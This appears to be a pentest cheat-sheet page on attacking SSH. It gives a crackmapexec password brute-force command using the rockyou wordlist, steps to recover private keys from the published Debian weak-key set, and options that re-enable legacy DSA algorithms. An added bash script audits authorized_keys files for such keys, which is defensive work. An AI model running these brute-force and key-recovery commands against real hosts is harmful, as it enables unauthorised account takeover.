# ssh 22

* **Bruteforcing credentials using** `crackmapexec ssh 10.11.1.251 -u <user> -p /usr/share/wordlists/rockyou.txt`
* If the machine is running a very old Linux (2008), the SSH public and private keys are publicly available. Since `authorized_keys` holds the public key, it can be used to find the private key:
  * `git clone https://github.com/g0tmi1k/debian-ssh`
  * `cd debian-ssh/common_keys/`
  * `tar -vjxf debian_ssh_dsa_1024_x86.tar.bz2`
  * `cd dsa/1024`
  * `grep -lr "<20 characters from authorized_keys>"`
  * This gives the private key.
* If there is any error, try:
  * Configure **/etc/ssh/ssh\_config**
    * Add this line at the end: **PubkeyAcceptedKeyTypes +ssh-dss**
  * Pass these arguments to the `ssh` command: `-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss`
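
The defender-side counterpart of the two points above (key pairs that are publicly available, and `ssh-dss` keys that only work once `PubkeyAcceptedKeyTypes +ssh-dss` is set), as an added example that is not part of the original page: it audits an `authorized_keys` file against a directory of published `.pub` files. The function name, the output labels and the paths passed in are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original page.
# Usage: audit_authorized_keys <authorized_keys file> <dir of published .pub files>
# Prints "<line number> <label>" for every entry that should be replaced:
#   DSA        entry is an ssh-dss key (the type the page has to re-enable
#              on the client with PubkeyAcceptedKeyTypes +ssh-dss)
#   KNOWN-KEY  the key blob also appears in the published key directory,
#              so its private half is public
#   UNPARSED   no "<type> <base64>" pair recognised; review by hand
audit_authorized_keys() {
  local file="$1" known_dir="$2" n=0 line entry type blob
  while IFS= read -r line || [ -n "$line" ]; do
    n=$((n + 1))
    case $line in '' | '#'*) continue ;; esac
    # Options such as from="..." may precede the key, so pick out the first
    # "<type> <base64>" pair instead of assuming it starts the line.
    # Only the plain dss/rsa/ed25519/ecdsa types are recognised here.
    entry=$(printf '%s\n' "$line" |
      grep -oE '(ssh-(dss|rsa|ed25519)|ecdsa-sha2-nistp[0-9]+) [A-Za-z0-9+/]+=*' |
      head -n 1)
    if [ -z "$entry" ]; then
      echo "$n UNPARSED"
      continue
    fi
    type=${entry%% *}
    blob=${entry#* }
    if [ "$type" = "ssh-dss" ]; then
      echo "$n DSA"
    fi
    # -F matches the blob as a fixed string, so '+' and '/' are literal.
    if grep -rqF --include='*.pub' -- "$blob" "$known_dir" 2>/dev/null; then
      echo "$n KNOWN-KEY"
    fi
  done < "$file"
}
```

For the second argument, point it at the extracted `dsa/1024` directory from the steps above. Any line it reports is a key to remove and regenerate.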
